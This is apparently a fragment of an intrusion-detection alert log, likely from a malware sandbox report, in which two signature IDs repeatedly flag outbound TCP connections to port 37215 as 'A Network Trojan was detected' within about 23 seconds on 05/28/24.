                  SID:2829579
                  Source Port:33900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490340
                  SID:2829579
                  Source Port:35312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.609040
                  SID:2829579
                  Source Port:36586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530513
                  SID:2835222
                  Source Port:55694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578051
                  SID:2835222
                  Source Port:53266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491994
                  SID:2835222
                  Source Port:54370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585438
                  SID:2835222
                  Source Port:55716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650889
                  SID:2835222
                  Source Port:57962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527633
                  SID:2835222
                  Source Port:50030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585195
                  SID:2835222
                  Source Port:39956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849002
                  SID:2829579
                  Source Port:37732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664416
                  SID:2835222
                  Source Port:38742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585759
                  SID:2829579
                  Source Port:54820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491982
                  SID:2835222
                  Source Port:38072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542775
                  SID:2835222
                  Source Port:49376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911587
                  SID:2829579
                  Source Port:37608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489839
                  SID:2835222
                  Source Port:59978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579121
                  SID:2829579
                  Source Port:40276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453859
                  SID:2829579
                  Source Port:58090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888629
                  SID:2835222
                  Source Port:42320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942518
                  SID:2829579
                  Source Port:45540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906783
                  SID:2835222
                  Source Port:48236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.802007
                  SID:2829579
                  Source Port:57732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604747
                  SID:2835222
                  Source Port:56644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729784
                  SID:2835222
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661662
                  SID:2835222
                  Source Port:39258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.661019
                  SID:2829579
                  Source Port:53206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627798
                  SID:2829579
                  Source Port:51392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.511583
                  SID:2829579
                  Source Port:33192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695422
                  SID:2835222
                  Source Port:35892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299034
                  SID:2835222
                  Source Port:57704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578625
                  SID:2829579
                  Source Port:37290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702152
                  SID:2835222
                  Source Port:59312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652038
                  SID:2835222
                  Source Port:40948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788925
                  SID:2835222
                  Source Port:51234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923943
                  SID:2835222
                  Source Port:37938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907619
                  SID:2829579
                  Source Port:40012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908522
                  SID:2835222
                  Source Port:44136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489188
                  SID:2829579
                  Source Port:59106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789480
                  SID:2835222
                  Source Port:38998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799590
                  SID:2829579
                  Source Port:41896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.931110
                  SID:2829579
                  Source Port:51978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545853
                  SID:2835222
                  Source Port:41200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661172
                  SID:2829579
                  Source Port:38722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920467
                  SID:2835222
                  Source Port:39062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585527
                  SID:2829579
                  Source Port:44104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657758
                  SID:2835222
                  Source Port:56488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887483
                  SID:2829579
                  Source Port:39282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795622
                  SID:2835222
                  Source Port:42590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591097
                  SID:2829579
                  Source Port:33300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718944
                  SID:2829579
                  Source Port:50652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300995
                  SID:2829579
                  Source Port:43562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926521
                  SID:2835222
                  Source Port:36804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845250
                  SID:2835222
                  Source Port:36866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536553
                  SID:2829579
                  Source Port:51636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694991
                  SID:2835222
                  Source Port:35032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906692
                  SID:2829579
                  Source Port:45256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629171
                  SID:2829579
                  Source Port:56940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650326
                  SID:2835222
                  Source Port:39772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527892
                  SID:2829579
                  Source Port:60646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595601
                  SID:2829579
                  Source Port:38986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547579
                  SID:2829579
                  Source Port:49144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316548
                  SID:2829579
                  Source Port:32990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592951
                  SID:2835222
                  Source Port:52350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488128
                  SID:2835222
                  Source Port:49048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906795
                  SID:2835222
                  Source Port:41330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.596099
                  SID:2829579
                  Source Port:47574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775910
                  SID:2829579
                  Source Port:33438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583413
                  SID:2835222
                  Source Port:35726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872262
                  SID:2835222
                  Source Port:59810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857169
                  SID:2835222
                  Source Port:39630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530888
                  SID:2835222
                  Source Port:39674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543131
                  SID:2829579
                  Source Port:59444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888332
                  SID:2829579
                  Source Port:45048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806398
                  SID:2835222
                  Source Port:33170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845022
                  SID:2829579
                  Source Port:41360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293759
                  SID:2829579
                  Source Port:36830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655664
                  SID:2835222
                  Source Port:48742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860084
                  SID:2829579
                  Source Port:51516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661747
                  SID:2829579
                  Source Port:39948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542580
                  SID:2835222
                  Source Port:55540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.909412
                  SID:2835222
                  Source Port:44354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817825
                  SID:2835222
                  Source Port:50688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695267
                  SID:2829579
                  Source Port:35354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661182
                  SID:2835222
                  Source Port:38176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656321
                  SID:2835222
                  Source Port:44238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488140
                  SID:2835222
                  Source Port:48808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528174
                  SID:2829579
                  Source Port:54152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537221
                  SID:2829579
                  Source Port:34240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742608
                  SID:2835222
                  Source Port:52604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604429
                  SID:2829579
                  Source Port:47834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927153
                  SID:2829579
                  Source Port:55954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798083
                  SID:2835222
                  Source Port:39584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719096
                  SID:2835222
                  Source Port:57844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493313
                  SID:2835222
                  Source Port:51624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.753911
                  SID:2835222
                  Source Port:46322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793140
                  SID:2829579
                  Source Port:53560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594640
                  SID:2835222
                  Source Port:60812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695747
                  SID:2829579
                  Source Port:56654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527234
                  SID:2835222
                  Source Port:38948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584138
                  SID:2835222
                  Source Port:48722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276199
                  SID:2829579
                  Source Port:39404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543229
                  SID:2829579
                  Source Port:53088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312671
                  SID:2835222
                  Source Port:44512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906096
                  SID:2835222
                  Source Port:38370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627977
                  SID:2835222
                  Source Port:49318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488675
                  SID:2835222
                  Source Port:55770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277334
                  SID:2829579
                  Source Port:50042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904679
                  SID:2829579
                  Source Port:38482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591347
                  SID:2829579
                  Source Port:45384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319100
                  SID:2829579
                  Source Port:41724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510305
                  SID:2829579
                  Source Port:38798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737794
                  SID:2835222
                  Source Port:58596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766071
                  SID:2835222
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798128
                  SID:2835222
                  Source Port:57842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911997
                  SID:2835222
                  Source Port:54640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527887
                  SID:2835222
                  Source Port:54924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276851
                  SID:2835222
                  Source Port:38954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495934
                  SID:2829579
                  Source Port:35866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771089
                  SID:2829579
                  Source Port:35106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888609
                  SID:2829579
                  Source Port:60088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660634
                  SID:2835222
                  Source Port:47190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920019
                  SID:2829579
                  Source Port:45682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585022
                  SID:2835222
                  Source Port:40968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278732
                  SID:2835222
                  Source Port:34224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793660
                  SID:2835222
                  Source Port:35856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543428
                  SID:2829579
                  Source Port:60118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821145
                  SID:2835222
                  Source Port:42144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911135
                  SID:2829579
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908048
                  SID:2835222
                  Source Port:33486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488087
                  SID:2829579
                  Source Port:48116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888014
                  SID:2835222
                  Source Port:36500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312671
                  SID:2835222
                  Source Port:49266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.800742
                  SID:2835222
                  Source Port:51588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886287
                  SID:2829579
                  Source Port:40858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886609
                  SID:2829579
                  Source Port:42646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718876
                  SID:2829579
                  Source Port:51420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678595
                  SID:2835222
                  Source Port:37240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885473
                  SID:2835222
                  Source Port:36474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719833
                  SID:2835222
                  Source Port:54314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491363
                  SID:2835222
                  Source Port:37688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628982
                  SID:2835222
                  Source Port:53930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718864
                  SID:2835222
                  Source Port:41302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528276
                  SID:2829579
                  Source Port:37020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.804176
                  SID:2829579
                  Source Port:42714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887991
                  SID:2829579
                  Source Port:46886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323122
                  SID:2835222
                  Source Port:35708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847588
                  SID:2835222
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907966
                  SID:2829579
                  Source Port:35220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887856
                  SID:2835222
                  Source Port:56228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.848874
                  SID:2829579
                  Source Port:54168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796696
                  SID:2835222
                  Source Port:39990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908182
                  SID:2835222
                  Source Port:33046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530234
                  SID:2835222
                  Source Port:53842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546652
                  SID:2835222
                  Source Port:50496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660954
                  SID:2829579
                  Source Port:56706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292594
                  SID:2829579
                  Source Port:53054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489874
                  SID:2829579
                  Source Port:59692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.924461
                  SID:2829579
                  Source Port:36522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.511584
                  SID:2835222
                  Source Port:34710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910924
                  SID:2835222
                  Source Port:55706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847201
                  SID:2829579
                  Source Port:37876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737994
                  SID:2829579
                  Source Port:46260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766453
                  SID:2835222
                  Source Port:56144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530616
                  SID:2835222
                  Source Port:54688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.682875
                  SID:2835222
                  Source Port:44590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742778
                  SID:2835222
                  Source Port:40624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.700406
                  SID:2829579
                  Source Port:53204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489869
                  SID:2835222
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.603998
                  SID:2835222
                  Source Port:42262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720195
                  SID:2829579
                  Source Port:42006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796581
                  SID:2835222
                  Source Port:35492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.886676
                  SID:2835222
                  Source Port:41852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:09.531251
                  SID:2835222
                  Source Port:45374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555699
                  SID:2835222
                  Source Port:45204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492193
                  SID:2835222
                  Source Port:39962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494596
                  SID:2829579
                  Source Port:47532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742948
                  SID:2829579
                  Source Port:42378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795647
                  SID:2829579
                  Source Port:42208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489888
                  SID:2835222
                  Source Port:41186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659915
                  SID:2835222
                  Source Port:55510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296749
                  SID:2835222
                  Source Port:57032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845940
                  SID:2829579
                  Source Port:52632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
